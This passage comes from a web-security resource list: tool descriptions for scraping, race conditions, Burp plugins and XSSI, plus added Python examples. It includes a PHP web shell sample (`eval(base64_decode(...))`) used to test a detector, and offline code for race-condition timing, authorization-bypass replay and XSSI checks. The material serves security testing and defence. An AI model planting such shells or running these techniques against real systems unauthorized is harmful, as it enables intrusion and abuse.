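    "helpers.php": "<?php\nfunction format_price($amount) {\n    return number_format($amount, 2);\n}\n"
                   "function is_logged_in() {\n    return isset($_SESSION['user']);\n}\n",
    "uploads/img.php": "<?php @eval(base64_decode('" + _blob + "')); ?>\n",
}

if __name__ == "__main__":
    for name, total, m in rank_files(SAMPLES):
        print(f"{total:2d} {name:18s} entropy={m['entropy']:.2f} "
              f"longest={m['longest_word']} ic={m['ic']:.3f} keywords={m['keywords']}")
```

Rank summing is what keeps any single test from dominating: minified JavaScript also has long words, and a short config file can have a low index of coincidence by chance, but a file that tops every list is worth opening. NeoPI's intended use, as its description says, is alongside signature tools such as Linux Malware Detect rather than instead of them.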


Scraping

  • 101
  • Articles/Papers/Talks/Writeups
  • General
  • Tools
    • Puppeteer
      • Puppeteer is a Node library which provides a high-level API to control Chrome or Chromium over the DevTools Protocol. Puppeteer runs headless by default, but can be configured to run full (non-headless) Chrome or Chromium.
    • dvcs-ripper
      • Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... It can rip repositories even when directory browsing is turned off.
    • Scrapy
      • An open source and collaborative framework for extracting the data you need from websites.
  • Miscellaneous
    • WeasyPrint
      • WeasyPrint is a visual rendering engine for HTML and CSS that can export to PDF. It aims to support web standards for printing. WeasyPrint is free software made available under a BSD license.
    • BeautifulSoup

Tabnabbing Attacks


Timing-based Attacks/Data race Attacks

  • 101
  • Articles/Blogposts/Writeups
  • Papers
    • Race Detection for Web Applications - Boris Petrov, Martin Vechev, Manu Sridharan, Julian Dolby
      • We present the first formulation of a happens-before relation for common web platform features. Developing this relation was a non-trivial task, due to complex feature interactions and browser differences. We also present a logical memory access model for web applications that abstracts away browser implementation details. Based on the above, we implemented WEBRACER, the first dynamic race detector for web applications. WEBRACER is implemented atop the production-quality WebKit engine, enabling testing of full-featured web sites. WEBRACER can also simulate certain user actions, exposing more races. We evaluated WEBRACER by testing a large set of Fortune 100 company web sites. We discovered many harmful races, and also gained insights into how developers handle asynchrony in practice.
  • Tools
    • Requests-Racer
      • Requests-Racer is a small Python library that lets you use the Requests library to submit multiple requests that will be processed by their destination servers at approximately the same time, even if the requests have different destinations or have payloads of different sizes. This can be helpful for detecting and exploiting race condition vulnerabilities in web applications. (For more information, see motivation.md.)
    • Race the Web
      • Tests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) simultaneously, and then compares the responses from the server for uniqueness. Includes a number of configuration options.
    • timing_attack
      • Perform timing attacks against web applications
    • Race condition exploit
      • Tool to help with the exploitation of web application race conditions
  • Miscellaneous
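Requests-Racer's promise above, that requests of different sizes are processed at approximately the same time, needs a trick beyond firing threads: the network, not the thread scheduler, decides when each request completes at the server. The usual technique, assumed here and shown as an added example that is not the code of Requests-Racer, Race the Web or the other tools listed, is last-byte synchronisation: every worker sends its whole request except the final byte, all workers meet at a barrier, and then the last bytes are released together, so the server sees all requests complete within the same few microseconds. It runs offline against a constructed local recorder on 127.0.0.1; the `/redeem` path and the bodies are made up.

```python
"""Added example: last-byte synchronisation for web race conditions, against
a constructed local server that records when each request body is complete."""
import socket
import threading
import time


def start_recorder(expected):
    """Constructed HTTP-ish server on a free localhost port. Appends
    (monotonic time, body) to `received` once a request body is complete,
    then answers 200. Returns (port, received)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(expected)
    port = srv.getsockname()[1]
    received, lock = [], threading.Lock()

    def handle(conn):
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = conn.recv(4096)
            if not chunk:
                return
            buf += chunk
        head, body = buf.split(b"\r\n\r\n", 1)
        length = next(int(h.split(b":", 1)[1].strip()) for h in head.split(b"\r\n")
                      if h.lower().startswith(b"content-length:"))
        while len(body) < length:          # the last byte arrives separately
            chunk = conn.recv(4096)
            if not chunk:
                return
            body += chunk
        with lock:
            received.append((time.monotonic(), body))
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\nConnection: close\r\n\r\n")
        conn.close()

    def accept_loop():
        for _ in range(expected):
            conn, _ = srv.accept()
            threading.Thread(target=handle, args=(conn,), daemon=True).start()
        srv.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return port, received


def race(port, bodies):
    """Send every body with last-byte sync. Returns the client-side event log
    [("partial", i) | ("final", i)] in the order the events happened."""
    n = len(bodies)
    barrier, events, elock = threading.Barrier(n), [], threading.Lock()

    def worker(i, body):
        req = (f"POST /redeem HTTP/1.1\r\nHost: 127.0.0.1\r\n"
               "Content-Type: application/x-www-form-urlencoded\r\n"
               f"Content-Length: {len(body)}\r\n\r\n").encode() + body
        s = socket.create_connection(("127.0.0.1", port))
        s.sendall(req[:-1])                # everything but the last byte
        with elock:
            events.append(("partial", i))
        barrier.wait()                     # wait until every request is staged
        s.sendall(req[-1:])                # release the final bytes together
        with elock:
            events.append(("final", i))
        s.recv(1024)                       # server replies only after the full body
        s.close()

    threads = [threading.Thread(target=worker, args=(i, b)) for i, b in enumerate(bodies)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return events


def partials_before_finals(events):
    """True when no last byte was released before every request was staged."""
    last_partial = max(i for i, (kind, _) in enumerate(events) if kind == "partial")
    first_final = min(i for i, (kind, _) in enumerate(events) if kind == "final")
    return last_partial < first_final


def completion_spread(received):
    """Seconds between the first and the last body completing at the server."""
    times = [t for t, _ in received]
    return max(times) - min(times)


if __name__ == "__main__":
    bodies = [b"code=WELCOME10&note=" + b"x" * (i * 50) for i in range(4)]
    port, received = start_recorder(len(bodies))
    race(port, bodies)
    print(f"{len(received)} requests, spread {completion_spread(received) * 1e6:.0f} us")
```

The bodies deliberately differ in size; without the barrier the 20-byte request would complete long before the 170-byte one and the race window would usually be missed. Over TLS the same idea applies to the last TLS record rather than the last plaintext byte, and a server that reads the whole body before dispatching (most do) is exactly what makes the window line up.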

TLS Redirection (and Virtual Host Confusion)


Web Cache Deception Attack


XML


  • unindexed
    • The site is constantly searching for itself in Google, over and over and over, 24 hours a day. The instant it finds itself in Google search results, the site will instantaneously and irrevocably securely delete itself. Visitors can contribute to the public content of the site, these contributions will also be destroyed when the site deletes itself.

  • COWL: A Confinement System for the Web
    • Robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content.
    • Paper


Burp Suite

  • Tutorials/Tips/Stuff
  • Plugins
    • Adapting Burp Extensions for Tailored Pentesting
    • AuthMatrix
      • AuthMatrix is a Burp Suite extension that provides a simple way to test authorization in web applications and web services.
    • Autorize
      • Autorize is an automatic authorization enforcement detection extension for Burp Suite. It was written in Python by Barak Tawily, an application security expert, and Federico Dotta, a security expert at Mediaservice.net. Autorize was designed to help security testers by performing automatic authorization tests. Since the latest release, Autorize also performs automatic authentication tests.
      • Escalating Privileges like a Pro - Gaurav Narwani
    • backslash-powered-scanner
      • This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
    • burp-rest-api
      • A REST/JSON API to the Burp Suite security tool. Upon successfully building the project, an executable JAR file is created with the Burp Suite Professional JAR bundled in it. When the JAR is launched, it provides a REST/JSON endpoint to access the Scanner, Spider, Proxy and other features of the Burp Suite Professional security tool.
    • BurpSmartBuster
      • A Burp Suite content discovery plugin that looks for files, directories and file extensions based on the current requests received by Burp Suite
    • BurpKit
      • BurpKit is a BurpSuite plugin which helps in assessing complex web apps that render the contents of their pages dynamically. It also provides a bi-directional Script bridge API which allows users to create quick one-off BurpSuite plugin prototypes which can interact directly with the DOM and Burp's extender API.
    • collaborator-everywhere
      • A Burp Suite Pro extension which augments your proxy traffic by injecting non-invasive headers designed to reveal backend systems by causing pingbacks to Burp Collaborator
    • Co2
      • Co2 includes several useful enhancements bundled into a single Java-based Burp extension. The extension has its own configuration tab with multiple sub-tabs (one for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality.
    • distribute-damage
      • Designed to make Burp evenly distribute load across multiple scanner targets, this extension introduces a per-host throttle, and a context menu to trigger scans from. It may also come in useful for avoiding detection.
    • HUNT
      • HUNT is a Burp Suite extension to (1) identify common parameters vulnerable to certain vulnerability classes and (2) organize testing methodologies inside of Burp Suite.
    • IntruderPayloads
    • Office Open XML Editor - burp extension
    • ParrotNG - burp plugin
    • PwnBack
      • Burp Extender plugin that generates a sitemap of a website using Wayback Machine
    • SAML Raider
      • SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: manipulating SAML messages and managing X.509 certificates.
    • swurg
      • Parses Swagger files into Burp Suite for automating RESTful API testing; approved by Burp for inclusion in the official BApp Store.
    • Burp-molly-pack
      • Burp-molly-pack is Yandex's security checks pack for Burp. Its main goal is to extend Burp's checks. The pack contains active and passive security checks.
    • NoPE Proxy
      • Non-HTTP Protocol Extension (NoPE) Proxy and DNS for Burp Suite.
    • AutoRepeater
      • Burp Suite is an intercepting HTTP proxy, and it is the de facto tool for performing web application security testing. While Burp Suite is a very useful tool, using it to perform authorization testing is often a tedious effort involving a "change request and resend" loop, which can miss vulnerabilities and slow down testing. AutoRepeater, an open source Burp Suite extension, was developed to alleviate this effort. AutoRepeater automates and streamlines web application authorization testing, and provides security researchers with an easy-to-use tool for automatically duplicating, modifying, and resending requests within Burp Suite while quickly evaluating the differences in responses.
    • Uniqueness plugin for Burp Suite
      • Makes requests unique based on regular expressions. Handy for registration forms and any other endpoint that requires unique values upon every request.
    • Bumpster
      • The Unofficial Burp Extension for DNSDumpster.com. You simply supply a domain name and it returns a ton of DNS information and basically lays out the external network topology.
    • J2EEScan
      • J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.
    • JWT4B
      • JSON Web Tokens (JWT) support for the Burp Interception Proxy. JWT4B will let you manipulate a JWT on the fly, automate common attacks against JWT and decode it for you in the proxy history. JWT4B automagically detects JWTs in the form of 'Authorization Bearer' headers as well as customizable post body parameters.
    • Brida
      • Brida is a Burp Suite Extension that, working as a bridge between Burp Suite and Frida, lets you use and manipulate applications’ own methods while tampering the traffic exchanged between the applications and their back-end services/servers. It supports all platforms supported by Frida (Windows, macOS, Linux, iOS, Android, and QNX)
    • burp-suite-error-message-checks
      • Burp Suite extension to passively scan for applications revealing server error messages
    • Postman-Integration
      • Postman Integration is an extension for Burp to generate Postman collection format JSON files.
    • Stepper
      • Stepper is designed to be a natural evolution of Burp Suite's Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps.
    • LinkDumper Burp Plugin
      • Extract (links/possible endpoints) from responses & filter them via decoding/sorting
    • Cyber Security Transformation Chef
      • The Cyber Security Transformation Chef (CSTC) is a Burp Suite extension. It is built for security experts to extend Burp Suite by chaining simple operations for each incoming or outgoing message. It can also be used to quickly apply custom formatting to a message.
    • jsonp
      • jsonp is a Burp Extension which attempts to reveal JSONP functionality behind JSON endpoints. This could help reveal cross-site script inclusion vulnerabilities or aid in bypassing content security policies.
    • Asset Discover
      • Burp Suite extension to discover assets from HTTP response using passive scanning.
      • Blogpost
    • Dr. Watson
      • Dr. Watson is a simple Burp Suite extension that helps find assets, keys, subdomains, IP addresses, and other useful information! It's your very own discovery side kick, the Dr. Watson to your Sherlock!
    • BurpExtenderHeaderChecks
    • Hackbar
      • Hackbar plugin for Burp
    • HTTPSmuggler
      • A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques. This extension has been developed by Soroush Dalili (@irsdl) from NCC Group.
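AuthMatrix, Autorize and AutoRepeater all automate the same loop: take a request captured in a privileged session, resend it with a lower-privileged (or no) session, and diff the responses. The following is an added example, not code from any of those extensions, showing that loop with the two decisions that matter in practice: comparing bodies rather than only status codes (an application that answers 200 with an error body would otherwise look bypassed), and treating "same status, different body" as something to review rather than as a pass, because per-user endpoints legitimately return the same shape with different data. `simulated_app` is a constructed target with made-up session values and deliberate authorization bugs, so the example runs offline.

```python
"""Added example: replay captured requests with weaker sessions and diff the
responses, the loop that Autorize/AuthMatrix/AutoRepeater automate in Burp.
simulated_app, its sessions and its bugs are constructed for the example."""
from difflib import SequenceMatcher


def simulated_app(method, path, session):
    """Constructed target with inconsistent authorization checks."""
    role = {"sess-admin": "admin", "sess-user": "user"}.get(session)
    if role is None:
        return (302, "Location: /login")
    if method == "GET" and path == "/api/users":
        if role == "admin":
            return (200, '[{"id":1,"name":"alice"},{"id":2,"name":"bob"}]')
        return (403, '{"error":"forbidden"}')
    if method == "DELETE" and path.startswith("/api/users/"):
        return (200, '{"deleted":true}')                     # bug: no role check at all
    if method == "GET" and path == "/api/export":
        if role == "admin":
            return (200, '{"status":"ok","rows":[{"id":1},{"id":2}]}')
        return (200, '{"status":"error","reason":"forbidden"}')  # denial, but still 200
    if method == "GET" and path == "/api/profile":
        return (200, '{"name":"%s"}' % role)                  # per-user data, same shape
    return (404, "")


def replay(app, captured, privileged, unprivileged, anonymous=None, threshold=0.9):
    """For each captured (method, path), replay with the unprivileged and the
    anonymous session and compare against the privileged response.
    Returns [(method, path, who, verdict, status, similarity)]."""
    findings = []
    for method, path in captured:
        ref_status, ref_body = app(method, path, privileged)
        for who, session in (("unprivileged", unprivileged), ("anonymous", anonymous)):
            status, body = app(method, path, session)
            similarity = SequenceMatcher(None, ref_body, body).ratio()
            if status == ref_status and similarity >= threshold:
                verdict = "BYPASSED"       # weaker session got the privileged answer
            elif status == ref_status:
                verdict = "REVIEW"         # same status, different body: look by hand
            else:
                verdict = "enforced"
            findings.append((method, path, who, verdict, status, round(similarity, 2)))
    return findings


def verdicts(findings):
    """Index findings as {(method, path, who): verdict} for quick lookup."""
    return {(m, p, who): v for m, p, who, v, _, _ in findings}


# Constructed capture: what the privileged user's proxy history would contain.
CAPTURED = [("GET", "/api/users"), ("DELETE", "/api/users/2"),
            ("GET", "/api/export"), ("GET", "/api/profile")]

if __name__ == "__main__":
    for row in replay(simulated_app, CAPTURED, "sess-admin", "sess-user"):
        print(*row)
```

On a real target the replay function would resend the captured request with the cookie or `Authorization` header swapped, which is what the extensions do from the proxy history. Note that `DELETE` is a state-changing request: replaying it unprivileged is the finding, but it also deletes the record, so replays of non-idempotent requests need a throwaway account and a restorable environment.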

General Cloud Services


AWS


Microsoft Azure


Cloudflare


Google Cloud


Bug Bounty Writeups

Client to Authenticator Protocol (CTAP) & FIDO2

  • AWS Security Whitepaper - https://d1.awsstatic.com/whitepapers/Security/AWS_Security_Whitepaper.pdf
  • AWS Storage Services Whitepaper - https://d1.awsstatic.com/whitepapers/Storage/AWS%20Storage%20Services%20Whitepaper-v9.pdf

  • Breaking and abusing specifications and policies - Frans Rosén(SecurityFest 2018)

    • Last year at Secfest, Frans Rosén talked about DNS hijacking using cloud services. This time, he approaches technologies where verification methods actually exists and how to break them. Let’s Encrypt closed down one of their three blessed verification methods due to a bug Frans found in January. Cloud storage containers already patched from being publicly exposed are still often vulnerable to full modification, extraction and deletion by abusing weak policies and application logic. Frans goes through some weak design patterns, policy structures and explains how to bypass them which have netted him over $45,000 in bug bounties.
  • Turtles All The Way Down: Storing Secrets in the Cloud and in the Data Center - Daniel Somerfield

  • Web IDL Standards

    • This document defines an interface definition language, Web IDL, that can be used to describe interfaces that are intended to be implemented in web browsers. Web IDL is an IDL variant with a number of features that allow the behavior of common script objects in the web platform to be specified more readily. How interfaces described with Web IDL correspond to constructs within ECMAScript execution environments is also detailed in this document. It is expected that this document acts as a guide to implementors of already-published specifications, and that newly published specifications reference this document to ensure conforming implementations of interfaces are interoperable.
  • Big List of Naughty Strings

    • The Big List of Naughty Strings is an evolving list of strings which have a high probability of causing issues when used as user-input data. This is intended for use in helping both automated and manual QA testing; useful for whenever your QA engineer walks into a bar.

  • Character encodings table - http://l0.cm/encodings/table/

JSON

Add links to SSL/TLS RFCs

Homograph attacks

XSSI

  • The Tale of a Fameless but Widespread Web Vulnerability Class - Veit Hailperin

    • Two key components account for finding vulnerabilities of a certain class: awareness of the vulnerability and ease of finding it. Cross-Site Script Inclusion (XSSI) vulnerabilities are not mentioned in the de facto standard for public attention, the OWASP Top 10. Additionally, there is no public tool available to facilitate finding XSSI. The impact ranges from leaking stored personal information and circumvention of token-based protection to complete compromise of accounts. XSSI vulnerabilities are fairly widespread, and the lack of detection increases the risk of each XSSI. In this talk we are going to demonstrate how to find XSSI, how to exploit XSSI and also how to protect against XSSI.
  • 0d1n

    • 0d1n is a tool for automating customized attacks against web applications.
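Since the talk above notes that no public tool finds XSSI, and the jsonp Burp extension in the plugin list looks for the most common form of it, here is the check itself as an added example (not code from the talk or from the jsonp extension). A response leaks through a cross-site `<script src=...>` only if it parses and executes as a script and hands the data to the including page: a JSONP wrapper whose function name is taken from the URL does, a dynamic script that assigns globals does, a bare JSON object literal is a syntax error and does not, an anti-XSSI prefix such as `)]}'` or `while(1);` breaks parsing on purpose, and `X-Content-Type-Options: nosniff` makes the browser refuse to execute a response whose MIME type is not JavaScript. The sample responses are constructed.

```python
"""Added example: classify whether a JSON/JS response is includable cross-site
via a <script> tag (XSSI). The SAMPLES are constructed, not real endpoints."""
import json
import re

JS_MIME = {"text/javascript", "application/javascript", "application/x-javascript",
           "text/ecmascript", "application/ecmascript"}
ANTI_XSSI_PREFIXES = (")]}'", "while(1);", "for(;;);")
JSONP_RE = re.compile(r"^\s*([A-Za-z_$][\w$.]*)\s*\((.*)\)\s*;?\s*$", re.S)
CALLBACK_PARAM_RE = re.compile(r"[?&](callback|jsonp|cb)=([\w$.]+)")
GLOBAL_ASSIGN_RE = re.compile(
    r"^\s*(?:var|let|const)\s+[\w$]+\s*=|^\s*(?:window|self)\.[\w$]+\s*=", re.M)


def assess(url, status, headers, body):
    """Return (verdict, reason) for one response fetched while authenticated."""
    h = {k.lower(): v for k, v in headers.items()}
    mime = h.get("content-type", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"
    if status != 200:
        return ("not-includable", "non-200 response")
    if body.lstrip().startswith(ANTI_XSSI_PREFIXES):
        return ("protected", "anti-XSSI prefix makes the response a script syntax error")
    if nosniff and mime not in JS_MIME:
        return ("blocked", "nosniff with a non-JavaScript MIME type: browser will not execute it")
    wrapper, cb = JSONP_RE.match(body), CALLBACK_PARAM_RE.search(url)
    if wrapper and cb and wrapper.group(1) == cb.group(2):
        return ("jsonp-includable", f"'{cb.group(1)}' parameter reflected as the wrapper function")
    if GLOBAL_ASSIGN_RE.search(body):
        return ("script-includable", "dynamic script assigns globals readable by the including page")
    try:
        data = json.loads(body)
    except ValueError:
        return ("unknown", "neither JSON nor a recognised script shape; inspect manually")
    if isinstance(data, list):
        return ("legacy-only", "array literal is valid script but leaks only in old engines")
    return ("not-includable", "JSON object literal is a syntax error when run as a script")


# Constructed responses: (url, status, headers, body).
SAMPLES = [
    ("https://api.example.invalid/me?callback=handle", 200,
     {"Content-Type": "application/json"},
     'handle({"user":"alice","email":"alice@example.invalid"});'),
    ("https://api.example.invalid/me?callback=handle", 200,
     {"Content-Type": "application/json", "X-Content-Type-Options": "nosniff"},
     'handle({"user":"alice"});'),
    ("https://api.example.invalid/me", 200,
     {"Content-Type": "application/json"}, 'while(1);{"user":"alice"}'),
    ("https://api.example.invalid/me", 200,
     {"Content-Type": "application/json"}, '{"user":"alice"}'),
    ("https://app.example.invalid/js/bootstrap.js", 200,
     {"Content-Type": "text/javascript"},
     'var currentUser = {"name":"alice","csrf":"f00"};\n'),
    ("https://api.example.invalid/friends", 200,
     {"Content-Type": "application/json"}, '[{"name":"bob"},{"name":"carol"}]'),
]


def assess_all(samples=SAMPLES):
    return [assess(*s)[0] for s in samples]


if __name__ == "__main__":
    for sample, verdict in zip(SAMPLES, assess_all()):
        print(f"{verdict:18s} {sample[0]}  ->  {assess(*sample)[1]}")
```

Two caveats for the flagged cases: the include only leaks data if the victim's cookies accompany the cross-site script request, which SameSite cookie defaults now often prevent, and Chromium's cross-origin read blocking may keep a response with a JSON-like body away from the script context. The classifier therefore produces candidates for manual confirmation in a browser, which is also how the jsonp extension is meant to be used.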
